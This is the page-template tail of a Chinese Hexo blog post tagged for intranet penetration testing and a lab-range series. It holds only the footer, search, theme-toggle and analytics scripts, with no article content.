                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                    <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                        <span class="chip bg-color">红日靶场系列</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
